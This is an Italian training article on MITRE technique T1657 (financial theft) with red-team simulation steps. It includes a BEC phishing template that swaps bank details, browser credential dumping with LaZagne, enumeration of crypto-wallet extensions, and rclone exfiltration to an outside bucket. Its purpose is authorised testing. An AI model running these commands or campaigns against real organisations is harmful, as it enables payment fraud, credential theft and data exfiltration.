Furto Finanziario: Financial Theft (T1657)

Il furto finanziario rappresenta l'obiettivo terminale di numerose catene d'attacco: non un passaggio intermedio, ma il punto in cui l'intrusione si traduce in danno economico diretto. La tecnica T1657 ricade nella tattica Impact (TA0040), la fase della kill chain in cui l'avversario manipola, interrompe o distrugge sistemi e dati — o, in questo caso, sottrae risorse monetarie alla vittima.

I vettori sono eterogenei: si va dalla doppia estorsione ransomware — cifratura dei dati seguita dalla minaccia di pubblicazione su leak site — al Business Email Compromise (BEC), dove l'impersonificazione di un'entità fidata convince la vittima a effettuare bonifici verso conti controllati dall'attaccante. A questi si aggiungono il furto di credenziali per wallet di criptovalute, le frodi bancarie condotte dopo mesi di osservazione dei processi transazionali legittimi, e gli schemi di tipo "pig butchering".

Il panorama censito è significativo: 14 gruppi attivi, 5 software dedicati, 1 campagna documentata e 2 mitigazioni specifiche. L'impatto potenziale è amplificato dal fatto che il furto finanziario può colpire contemporaneamente più vittime — l'organizzazione compromessa e il soggetto che effettua il pagamento — e può persino fungere da diversivo per mascherare obiettivi come la distruzione di dati o l'interruzione operativa.


Simulare il furto finanziario in un engagement red team significa riprodurre le condizioni che portano alla sottrazione di fondi, senza ovviamente completare transazioni reali. L'obiettivo è dimostrare al cliente che un attaccante, raggiunto un certo livello di accesso, può concretamente monetizzare l'intrusione.

Simulazione BEC e impersonificazione email. Il primo scenario da replicare è il Business Email Compromise. Con GoPhish (open source) si costruisce una campagna che simula l'impersonificazione di un fornitore o di un dirigente. La chiave è configurare un template email che replichi una richiesta di pagamento legittima, modificando solo le coordinate bancarie. Prima di lanciare la campagna, è utile verificare se il dominio target ha record SPF, DKIM e DMARC configurati correttamente:

dig TXT example.com +short

Se DMARC è assente o impostato su p=none, il dominio è vulnerabile a spoofing diretto — un finding critico da documentare.

Raccolta credenziali da wallet crypto. Per simulare il comportamento di malware come BeaverTail e InvisibleFerret, si possono cercare estensioni browser associate a wallet di criptovalute sugli endpoint compromessi. Su Windows, le estensioni Chrome risiedono in percorsi prevedibili:

dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions" /b

Su macOS il percorso equivalente è sotto ~/Library/Application Support/Google/Chrome/Default/Extensions/. Ogni estensione corrisponde a un ID: confrontandoli con gli ID noti dei wallet crypto (MetaMask, Coinbase Wallet, Phantom), si identifica la superficie d'attacco. In un lab controllato, lo strumento LaZagne (open source) può estrarre credenziali memorizzate nei browser, dimostrando come un attaccante recupererebbe dati finanziari:

python3 laZagne.py browsers

Simulazione doppia estorsione. Per dimostrare la catena ransomware senza cifrare realmente i dati, si possono combinare due operazioni: esfiltrazione simulata con Rclone (open source) verso un bucket controllato dal red team, seguita dalla creazione di un file README con le istruzioni di riscatto nelle directory target.

rclone copy /percorso/dati/sensibili remote:exfil-bucket --transfers 4 --log-file rclone.log

Questo replica il pattern operativo documentato per gruppi come Akira, Play e Storm-0501, che esfiltrano prima di cifrare. Per la componente di cifratura simulata, è sufficiente rinominare file di test con estensione personalizzata (es. .encrypted_demo) senza alterare il contenuto, dimostrando l'impatto senza rischio.

Osservazione dei processi finanziari. In scenari più sofisticati, come quelli attribuiti a FIN13, il red team dovrebbe dedicare una fase di ricognizione interna all'identificazione di applicazioni ERP, sistemi di pagamento e processi di approvazione delle transazioni, documentando i punti dove un attaccante potrebbe inserirsi nel flusso.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.